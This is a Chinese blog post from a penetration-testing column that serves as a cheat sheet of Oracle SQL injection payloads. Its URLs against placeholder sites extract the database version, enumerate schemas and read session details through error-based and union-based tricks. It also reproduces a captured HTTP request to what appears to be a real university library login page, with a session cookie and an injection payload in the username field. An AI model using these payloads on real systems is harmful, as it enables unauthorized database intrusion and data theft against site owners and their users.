oracle 注入整理

最新推荐文章于 2024-05-15 12:36:45 发布
最新推荐文章于 2024-05-15 12:36:45 发布
阅读量3.9k 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p656456564545/article/details/49332331
版权

http://www.freebuf.com/articles/web/5411.html  demo

第一种方法http://www.xxox.cn/XXX/AA.php?id=1 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)-
第二种方法http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))–
第三种方法http://www.xxox.com/XXX/AA.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))–
爆库方法一:(用 and owner<>’库名’连接)http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where rownum=1),NULL from dual–
第二个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and rownum=1),NULL from dual–
第三个库名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and owner<>’SYSTEM’ and rownum=1),NULL from dual–
依此类推直到返回正常页面:
爆库方法二:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=1–            分割http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=2–
有时候会重复,例如:limiti=1-10会显示同样的内容
oracle 注入信息收集

1、当前用户权限     (select * from session_roles)
2、当前数据库版本   (select banner from sys.v_$version where rownum=1)
3、服务器出口IP     (用utl_http.request可以实现)
4、服务器监听IP     (select utl_inaddr.get_host_address from dual)
5、服务器操作系统   (select member from v$logfile where rownum=1)
6、服务器sid        (远程连接的话需要,select   instance_name   from   v$instance;)
7、当前连接用户     (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual)
Oracle也可以用sys_context来获取基本信息

SYS_CONTEXT(‘USERENV’,’TERMINAL’) terminal,
SYS_CONTEXT(‘USERENV’,’LANGUAGE’) language,
SYS_CONTEXT(‘USERENV’,’SESSIONID’) sessionid,
SYS_CONTEXT(‘USERENV’,’INSTANCE’) instance,
SYS_CONTEXT(‘USERENV’,’ENTRYID’) entryid,
SYS_CONTEXT(‘USERENV’,’ISDBA’) isdba,
SYS_CONTEXT(‘USERENV’,’NLS_TERRITORY’) nls_territory,
SYS_CONTEXT(‘USERENV’,’NLS_CURRENCY’) nls_currency,
SYS_CONTEXT(‘USERENV’,’NLS_CALENDAR’) nls_calendar,
SYS_CONTEXT(‘USERENV’,’NLS_DATE_FORMAT’) nls_date_format,
SYS_CONTEXT(‘USERENV’,’NLS_DATE_LANGUAGE’) nls_date_language,
SYS_CONTEXT(‘USERENV’,’NLS_SORT’) nls_sort,
SYS_CONTEXT(‘USERENV’,’CURRENT_USER’) current_user,
SYS_CONTEXT(‘USERENV’,’CURRENT_USERID’) current_userid,
SYS_CONTEXT(‘USERENV’,’SESSION_USER’) session_user,
SYS_CONTEXT(‘USERENV’,’SESSION_USERID’) session_userid,
SYS_CONTEXT(‘USERENV’,’PROXY_USER’) proxy_user,
SYS_CONTEXT(‘USERENV’,’PROXY_USERID’) proxy_userid,
SYS_CONTEXT(‘USERENV’,’DB_DOMAIN’) db_domain,
SYS_CONTEXT(‘USERENV’,’DB_NAME’) db_name,
SYS_CONTEXT(‘USERENV’,’HOST’) host,
SYS_CONTEXT(‘USERENV’,’OS_USER’) os_user,
SYS_CONTEXT(‘USERENV’,’EXTERNAL_NAME’) external_name,
SYS_CONTEXT(‘USERENV’,’IP_ADDRESS’) ip_address,
SYS_CONTEXT(‘USERENV’,’NETWORK_PROTOCOL’) network_protocol,
SYS_CONTEXT(‘USERENV’,’BG_JOB_ID’) bg_job_id,
SYS_CONTEXT(‘USERENV’,’FG_JOB_ID’) fg_job_id,
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_TYPE’) authentication_type,
SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_DATA’) authentication_data
例1:

http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((SYS_CONTEXT(‘USERENV’,'TERMINAL’)))–

例2:

http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,SYS_CONTEXT(‘USERENV’,'TERMINAL’),NULL from dual–



examples:

POST /noteservice/login1.jsp HTTP/1.1
Host: lib.tongji.edu.cn
Proxy-Connection: keep-alive
Content-Length: 176
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://lib.tongji.edu.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://lib.tongji.edu.cn/noteservice/fmy.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=3416A746B6C522633B7B97104084917C


userno=1531701' and 123=utl_inaddr.get_host_address(CHR(114)||(select   instance_name   from   v$instance)||CHR(114)) and  '1'='1&pword=828127&imageField.x=45&imageField.y=31

爬虫仔蛙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
***类网站搜集
weixin_34082789的博客
06-03 5359
|||***类网站搜集||| (排列不分先后,收集待完整) 中国***联盟 http://www.cnhacker.com/ 中国***联盟 http://www.chinahacker.com/ 华夏***同盟 http://www.77169.com/ 爱国者*** http://www.3800hk.com/ ***...
java图形界面编程设计标签,赶紧收藏备战金三银四!
m0_57285455的博客
06-29 245
一、对象的实例化 1.创建对象的方式 new:最常见的方式(本质是构造器) 变形1 : Xxx的静态方法 变形2 : XxBuilder/XxoxFactory的静态方法 Class的newInstance():反射的方式,只能调用空参的构造器,权限必须是public Constructor的newInstance(Xxx):反射的方式,位于java.lang.reflect.Constructor 可以调用空参、带参的构造器,权限没有要求 使用clone() :不调用任何构造器,当前类需
在网址上输入www.xxx.com到返回界面给用户发生了什么?
weixin_51287642的博客
08-06 24万+
在网址上输入www.xxx.com到返回界面给用户发生了什么? DNS域名解析(https://blog.csdn.net/yanshuanche3765/article/details/82589210)–>tcp三次握手建立连接(https://blog.csdn.net/xy010902100449/article/details/48274635)–>向服务器发送http请求,请求html文件–>服务器返回一个html文件–>tcp四次握手释放连接–>游览器解释html
2024年鸿蒙最新干货 Oracle注入和漏洞利用姿势总结(1),2024年最新移动端h5页面适配
最新发布
2401_84851126的博客
05-15 285
用户权限是执行特定类型的 SQL 语句或访问其他用户对象的权利,Oracle 中的权限可以分为系统权限和对象权限。前者是系统规定用户使用数据库的权限,后者是用户对其自己的表或视图的存取修改权限。Oracle 有超过 100 种不同的系统权限,只有实例管理员或具有 ADMIN 特权的用户才能授予或撤销系统特权,关于每种系统权限的细节,请读者自行查阅其官方文档:System privileges角色相当于一个用户组,其将多个权限和角色组合在一起,以便可以同时向用户授予和撤销它们。
Oracle注入——报错注入
weixin_46601374的博客
02-28 1409
1、什么是Oracle数据库? Oracle 数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 2、Oracle 系统表 Oracle中内置了大量的系统表(有点类似MySQL中的information_schema数据库),根据不同的权限可读取不同的系统表。可通过读取这些系统表获取我们想要的数据(用户信息、表、字段、数据库信息等) DBA、ALL、USER、V_$、GV_$、SESS
“XXX.exe 中的 0xXXXXXXXX处未处理的异常: 0xC0000005: 读取位置 0xXXXXXXXX 时发生访问冲突”的一种解决方案
brk1985的专栏
03-27 5953
CxxxDlg *pDlg = (CxxxDlg*)AfxGetMainWnd(); 定时器回调函数中pDlg调用类成员变量和成员函数时出现以上错误。经观察pDlg为空指针,确实意想不到。   解决方法: 设置全局变量CxxxDlg* g_pDlg = NULL;并且在OnInitDialog函数中添加把this指针赋予该对话框指针,此时g_pDlg不为空,可以通过g_pDlg访问类成员变
access+mssql+mysql+oracle 注入整理文档(详细图解)
05-28
access+mssql+mysql+oracle 注入整理文档(详细图解)access+mssql+mysql+oracle 注入整理文档(详细图解)access+mssql+mysql+oracle 注入整理文档(详细图解)access+mssql+mysql+oracle 注入整理文档(详细图解)access+...
Sql注入工具_动力节点Java学院整理
09-09
The Mole支持多种数据库,如SQL Server、MySQL、Postgres和Oracle,利用union注入和逻辑查询技术进行攻击。 3. **Pangolin**:Pangolin是NOSEC公司出品的安全测试工具,提供友好的图形界面,支持多种数据库系统,...
自己整理oracle和java笔试题
03-30
8. **Spring框架**:依赖注入,AOP(面向切面编程),以及Spring Boot和Spring Cloud的相关知识。 9. **Java EE相关**:Servlet、JSP、MVC模式,以及EJB和JSF等企业级开发组件。 10. **面试技巧**:如何准备自我...
java连接mysql-oracle源码整理
08-22
本资源“java连接mysql-oracle源码整理”聚焦于如何使用Java连接两种主流的关系型数据库管理系统:MySQL和Oracle。 一、Java与MySQL连接 1. **JDBC驱动**:Java Database Connectivity (JDBC) 是Java平台的标准...
java相关内容整理.zip
10-26
Java是一种广泛使用的面向对象的编程语言,由Sun Microsystems(现为Oracle公司)于1995年发布。它以其“一次编写,到处运行”的特性而闻名,因为Java代码可以跨平台运行,只需在不同的操作系统上安装Java虚拟机...
Oracle爆错手工注入.doc
04-05
手工注入方式,利用报错注入 Oracle
Oracle也有注入漏洞
09-11
Oracle也有注入漏洞
Verifying 000xxxxx ( 0%) Verify failed between address 0xxxxxx and 0xxxxxx Leaving target processor
Studying……
09-24 3万+
1. 首先要根据address后面的两个地址判断出错的到底是什么器件。一般情况出现错误的大多是存储器。     判断的方法是根据sopc中的地址,或者是system.h中的地址,查找相应出错的器件。 2. 检查硬件焊接是否正常。     很多时候有些问题是硬件焊接造成的,这个主要针对的是自己焊接的板子,一旦地址数据总线有任何焊接问题,都会出现verify failed错误。 3.
报错 | Access to XMLHttpRequest at ‘http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login‘ from origin
热门推荐
A123ppleQueen的博客
11-22 43万+
Access to XMLHttpRequest at 'http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login' from origin 'http://xx.x.x.xx:xxxx' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is pre
虚拟机上配置xxx.com跳转到www.xxx.com
maorenqi101的专栏
07-24 5万+
三个地方要注意: 一、116.XXX.XXX.206(外网服务器)上的nginx.conf上配置: server_name xxx.com www.xxx.com; 保存重启nginx 二、内网服务器上(192.168.0.83)xxx.com.conf文件上配置如下:         ServerName xxx.com         ServerAlias www.xxx.com  
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2141
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1131
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
数据库注入提权总结(四)
蚁景网安学院
08-12 556
权限是用户对一项功能的执行权力。在Oracle中,根据系统的管理方式不同,将 Oracle 权限分为系统权限与实体权限两类。系统权限是指是否被授权用户可以连接到数据库上,在数据库中可以进行哪些系统操作。而实体权限是指用户对具体的模式实体 (schema) 所拥有的权限。...
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值